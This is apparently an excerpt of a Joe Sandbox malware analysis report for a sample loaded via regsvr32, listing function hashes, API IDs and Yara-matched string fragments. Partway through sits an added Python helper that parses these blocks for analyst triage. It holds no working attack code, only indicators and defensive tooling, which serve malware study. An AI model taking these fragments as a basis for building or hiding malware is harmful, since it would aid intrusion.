                                                                                                0x1800083b8
                                                                                                0x1800083c5
                                                                                                0x1800083d7
                                                                                                0x1800083db
                                                                                                0x1800083e9
                                                                                                0x1800083ed
                                                                                                0x1800083f1
                                                                                                0x1800083fb
                                                                                                0x18000840e
                                                                                                0x180008412
                                                                                                0x180008417
                                                                                                0x180008446

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 1239891234-0
                                                                                                • Opcode ID: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                • Instruction ID: d6e40695d6015e5c843dff92317e70983bbd332ebd8c23179410134a75d63e3d
                                                                                                • Opcode Fuzzy Hash: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
                                                                                                • Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: G]W2$Uf$Wlw$X2D7$n
                                                                                                • API String ID: 0-182303197
                                                                                                • Opcode ID: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                • Instruction ID: ffd1843cb2d792347fd3a22609872d3805c545e3b786e9d7b000107fa959c56b
                                                                                                • Opcode Fuzzy Hash: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
                                                                                                • Instruction Fuzzy Hash: CA122670A04709EFDB58DF68C18A99EBBF1FF48304F40816DE84AAB250D775DA18DB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: GK$M/uB$Q|-$~~K$Bt$
                                                                                                • API String ID: 0-557373213
                                                                                                • Opcode ID: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                • Instruction ID: e2a87c19f20955ed26852883d092eb62686b2b0846db26bbf8fdd2923f1e22b0
                                                                                                • Opcode Fuzzy Hash: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
                                                                                                • Instruction Fuzzy Hash: E5E1027550160CCBDF68DF38C0994D93BE1FF58718F611229FC6AA62A2DB78D918CB48
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .I$gBfh$i[$w|${
                                                                                                • API String ID: 0-448909954
                                                                                                • Opcode ID: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                • Instruction ID: 192f011f92c6255aba88882cc67dbd237c2deb85545f90746a6d52441553ed79
                                                                                                • Opcode Fuzzy Hash: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
                                                                                                • Instruction Fuzzy Hash: A6B11470D247499FCB88DFA9D8898DDBBF0FB48304F40921DE816AB250C778A985CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: cp$vm$x$zu$Kn#
                                                                                                • API String ID: 0-3521309225
                                                                                                • Opcode ID: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                • Instruction ID: 0a75bf628e98b18295662829c813f8372853ab447e4b3184f3b745a5548722e9
                                                                                                • Opcode Fuzzy Hash: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
                                                                                                • Instruction Fuzzy Hash: 98A114B1D147198FDB48CFA8D8898EEBBF0FB58314F108219E855B7290D3789949CF94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #0FQ$0T$C;$lXjD$tS
                                                                                                • API String ID: 0-817034907
                                                                                                • Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                • Instruction ID: db72f82e6d25ff96bcd186c057a8e443de8ef91040709b1617ce07a1c50a4d17
                                                                                                • Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
                                                                                                • Instruction Fuzzy Hash: 1B4192B180034E8FDB44DF64D88A4CE7FF0FB68398F215619E859A6250D3B89694CFD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,$3T$D-$Rc$l
                                                                                                • API String ID: 0-617906138
                                                                                                • Opcode ID: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                • Instruction ID: 0d1952477fd2d2f237aca549ee727aef2aa9b8e46c7bf24e4e72165d65c15183
                                                                                                • Opcode Fuzzy Hash: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
                                                                                                • Instruction Fuzzy Hash: 3D41D5B081078E8FDB44CF64D88A4CE7FF0FB58358F104619EC69A6260D3B89668CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00000001180001D98(long long __rbx, long long _a32) {
                                                                                                
                                                                                                				_a32 = __rbx;
                                                                                                			}
                                                                                                0x180001d98

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                • String ID:
                                                                                                • API String ID: 2933794660-0
                                                                                                • Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                • Instruction ID: 8b5b8807919832646eb0d744692d73e0514a3f66bd27872d13ad1b0d2e18aa1e
                                                                                                • Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
                                                                                                • Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%
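
Added example, not part of the Joe Sandbox report or of its IDA plugin: a small Python triage helper that parses the "Memory Dump Source" / "Similarity" metadata blocks in the form shown above and sorts each function by its API ID tokens and by whether the dump is PE-backed. It serves both the function ending at 0x180008446 (API ID ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual) and E00000001180001D98 (API ID CurrentTime$CounterFilePerformanceProcessQuerySystemThread). Those two token sets are consistent with the MSVC CRT's stack-cookie failure handler (RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter) and cookie initialiser (GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, QueryPerformanceCounter); reading them as compiler boilerplate rather than as dedicated anti-debug code is this example's assumption, not a finding of the report. The functions dumped from the unbacked region at 0x00F41000 ("based on PE: false", no API ID, only string IDs) are the ones the helper marks for cross-sample pivoting on the Instruction Fuzzy Hash. The sample text is constructed from three blocks on this page with whitespace trimmed; the class names returned by classify() are hypothetical labels.

```python
"""Triage helper for Joe Sandbox per-function metadata blocks (added example)."""
import re
from dataclasses import dataclass
from typing import FrozenSet, List

# Constructed sample input: three metadata blocks in the shape the report
# prints them, copied from this page with the indentation removed.
SAMPLE = """\
Memory Dump Source
• Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Similarity
• API ID:
• String ID: G]W2$Uf$Wlw$X2D7$n
• API String ID: 0-182303197
• Instruction Fuzzy Hash: CA122670A04709EFDB58DF68C18A99EBBF1FF48304F40816DE84AAB250D775DA18DB85
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF38C2A88340
Uniqueness Score: -1.00%
"""

# Joe Sandbox prints API IDs as CamelCase word fragments joined with "$";
# we only treat the ID as a bag of CamelCase tokens and ignore the "$".
CAMEL = re.compile(r"[A-Z][a-z0-9]*")
SOURCE = re.compile(
    r"Source File:\s*(\S+),\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)"
)

# Token sets (assumption, see lead-in): the CRT's __report_gsfailure and
# __security_init_cookie import exactly these API families.
GS_FAILURE = frozenset({"Debugger", "Present", "Unhandled", "Exception",
                        "Filter", "Capture", "Context", "Virtual", "Unwind"})
COOKIE_INIT = frozenset({"Current", "Process", "Thread", "System", "Time",
                         "Performance", "Counter"})


@dataclass
class FunctionBlock:
    source_file: str
    offset: int            # module base / region base the dump is relative to
    pe_backed: bool        # "based on PE: true" means a loaded image, not raw memory
    api_tokens: FrozenSet[str]
    string_id: str
    api_string_id: str
    fuzzy_hash: str


def _field(block: str, label: str) -> str:
    """Return the value after '• <label>:' on its own line, or '' if absent/empty."""
    m = re.search(r"^[•\s]*" + re.escape(label) + r":[ \t]*(.*)$", block, re.M)
    return m.group(1).strip() if m else ""


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split a report excerpt on 'Memory Dump Source' headers and parse each block."""
    out: List[FunctionBlock] = []
    for part in re.split(r"^Memory Dump Source\s*$", text, flags=re.M):
        src = SOURCE.search(part)
        if not src:
            continue  # preamble or a block without a source line
        out.append(FunctionBlock(
            source_file=src.group(1),
            offset=int(src.group(2), 16),
            pe_backed=(src.group(3) == "true"),
            api_tokens=frozenset(CAMEL.findall(_field(part, "API ID"))),
            string_id=_field(part, "String ID"),
            api_string_id=_field(part, "API String ID"),
            fuzzy_hash=_field(part, "Instruction Fuzzy Hash"),
        ))
    return out


def classify(fb: FunctionBlock) -> str:
    """Hypothetical triage label for one function block."""
    if GS_FAILURE <= fb.api_tokens:
        return "crt_gs_failure_handler"      # IsDebuggerPresent here is CRT boilerplate
    if COOKIE_INIT <= fb.api_tokens:
        return "crt_security_init_cookie"    # time/pid/tid/QPC mixed into the /GS cookie
    if not fb.api_tokens and not fb.pe_backed:
        return "unbacked_region_no_api"      # unpacked code: pivot on the fuzzy hash
    return "other"


def triage(text: str) -> List[str]:
    """One line per function: region, backing, label and a fuzzy-hash prefix to pivot on."""
    return [
        f"0x{fb.offset:x} {'pe' if fb.pe_backed else 'raw'} {classify(fb)} "
        f"fuzzy={fb.fuzzy_hash[:8]} strings={fb.string_id or '-'}"
        for fb in parse_blocks(text)
    ]


if __name__ == "__main__":
    for line in triage(SAMPLE):
        print(line)
```

The value for an analyst is the split between the PE-backed functions at 0x180000000 (compiler-generated runtime code, poor pivot material) and the functions dumped from the raw region at 0x00F41000, which carry the Yara-matched strings and whose Instruction Fuzzy Hash is the field worth searching across other reports.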

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #X$ $UCV$y4.)
                                                                                                • API String ID: 0-917551206
                                                                                                • Opcode ID: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                • Instruction ID: 872ac113d227417d04799d037f8cc11bbf31f681ad0819693572863b5a0ed8b7
                                                                                                • Opcode Fuzzy Hash: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
                                                                                                • Instruction Fuzzy Hash: 9512F4B1A0470C9FDB58DFA8E48A5DDBBF2FB48344F00412DEA06A7290D7B5D809CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: #X$rq%$tL>$".
                                                                                                • API String ID: 0-3922733902
                                                                                                • Opcode ID: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                • Instruction ID: d648eeba22ba1ab54aed37f6df740c64d02b316e4aacc8c18ed39c91bce3a77d
                                                                                                • Opcode Fuzzy Hash: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
                                                                                                • Instruction Fuzzy Hash: 9222CF719096C88BDBF8DF24C8896DD3BF0FF48344F90125A984E9A654DBB86685CF42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: g$-$HE$Vc
                                                                                                • API String ID: 0-2562162751
                                                                                                • Opcode ID: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
                                                                                                • Instruction ID: 6eb9b33485735fd4eb67e85d0be6016d93240fcb8198620c8bcbbd2fde0902f6
APIs
Memory Dump Source
• Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
• Opcode ID: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
• Instruction ID: df89035e7e7b250386178c13d978bdab97caeca02fa44d79d4a04f1db2bf885c
• Opcode Fuzzy Hash: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
• Instruction Fuzzy Hash: BCB12C77610B888BEB56CF29C8463987BA0F348B88F15C915EB59877A8CF39C955CB01
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
Similarity
• API ID: LinkObjectOpenSymbolic
• String ID:
• API String ID: 3706036087-0
• Opcode ID: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
• Instruction ID: f4502f775a5e45d64f420efd52fcf5a6929529857e1dcb94e78d5b08d8e8d060
• Opcode Fuzzy Hash: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
• Instruction Fuzzy Hash: 23E0C230B1896842F7EA96BAAC017AB1051A34D7C0F70D429BA02C80C0DCA9C3894704
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: D?"$8zfK
• API String ID: 0-617590365
• Opcode ID: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
• Instruction ID: 0828ddf6b19d4d27afa1993f1b78bb5a566ec31cc196b06964c6eea417654841
• Opcode Fuzzy Hash: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
• Instruction Fuzzy Hash: 251203B550560DCBDB68DF38C48A49E3BE0FF58318F201129FC269B2A2D774E964CB85
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #X$h}
• API String ID: 0-3021649463
• Opcode ID: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
• Instruction ID: 4062777863ed1dc5cf98f67c037af6867d18faafb82c54528816cdf64779fb1b
• Opcode Fuzzy Hash: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
• Instruction Fuzzy Hash: D12296719096888BEBF8DF24C885AD97BF0FF44704F90251ED84E9A650DB7C6645CF82
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #X$+ <
• API String ID: 0-1007305072
• Opcode ID: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
• Instruction ID: 25ba42df14fa006f30dfffd7b90842f080a5ae0f9499597df69724c53146689e
• Opcode Fuzzy Hash: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
• Instruction Fuzzy Hash: E10278B5900709CFDB88CF68C58A5DD7BB9FB59308F404129FC1E9A2A0D3B4E919CB56
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: Hc$aYG
• API String ID: 0-2147329803
• Opcode ID: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
• Instruction ID: edd0ea705c0ce2af50f5d0439a5e19cedcc12a74e96cf567f7cc8e2d07e92899
• Opcode Fuzzy Hash: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
• Instruction Fuzzy Hash: 1ED1207560170DCBDB68CF28C58A59E3BE8FF54308F504129FC1E862A5D7B8E829CB46
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: Ip$2/
• API String ID: 0-2558650176
• Opcode ID: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
• Instruction ID: b5a47cb2e59661b22f298c541d60d5bd3a9092a160009b9b8a0a7cfa2b65c8b2
• Opcode Fuzzy Hash: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
• Instruction Fuzzy Hash: 26E1D371505B888FEBB8DF28CC99BEB7BA0FB44306F10561AD84ADE290DB745685CF41
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID: CreateProcess
• String ID: h$j-`
• API String ID: 963392458-2572860821
• Opcode ID: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
• Instruction ID: 5be9a7e5a018486a9cf02e6452369461018c0c02cefe014cfdd936ec6ff932f0
• Opcode Fuzzy Hash: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
• Instruction Fuzzy Hash: 34C1E371904788CFDB6CDFA8C88A59DBBB1FB58308F20421DE916AB661DBB49845CF41
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: #z$UP
• API String ID: 0-3609392360
• Opcode ID: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
• Instruction ID: 50e0122f9c7f0b9a8a03f642c96ec472783a4b3025a86f618b3b81521e1576da
• Opcode Fuzzy Hash: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
• Instruction Fuzzy Hash: 14A15571904609DBDF58CFA8E4CA49EBBB0FB64354F60411DE852E72A0CB789999CFC1
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: )bkr$z~
• API String ID: 0-4035444816
• Opcode ID: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
• Instruction ID: a844858728208cd21e062d430eef41309a47579b0def34a8fa652222236e5164
• Opcode Fuzzy Hash: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
• Instruction Fuzzy Hash: 208190715187888FEBB8CF28CC867D937A4FB45314F648119D88ECA291DF785A49EB41
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: aK>$NM
• API String ID: 0-1076587397
• Opcode ID: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
• Instruction ID: 2450b7c736ed9741a6f4f0e0e887585eed24a6b24f6aaf854d8407cad665b801
• Opcode Fuzzy Hash: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
• Instruction Fuzzy Hash: 78B144B590030DCFDB98CF28C18A58D7BB8FB55348F505129FC1E9A2A1E3B5E614CB56
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: GcX$cy5X
• API String ID: 0-3427037236
• Opcode ID: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
• Instruction ID: 005cfbe3aa9d0bcf600fe313ab5facbd9d10e91349f48c4e227c1f1e44746bed
• Opcode Fuzzy Hash: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
• Instruction Fuzzy Hash: 4FA1D5B0548388CBEBBEDF34C88A6D93BA9FB54704F504619EC1E8E290DB745789DB41
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: &$U
• API String ID: 0-326847644
• Opcode ID: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
• Instruction ID: 744569086fc4e857d83195b2fe39dc0392d148723bcf64c9c454a5baee6ec25e
• Opcode Fuzzy Hash: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
• Instruction Fuzzy Hash: 309169B590038E8FDF48CF68D88A5DE7BB0FB14348F104A19FC66AA250D7B4D665CB94
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.334740049.0000000000F41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00F41000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_f41000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: k' {$z5
• API String ID: 0-3484172565
• Opcode ID: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
• Instruction ID: 58ed8a6320b1b5a37215d061fa39dea768bce17d2daa0cab01049e0a838e55e1
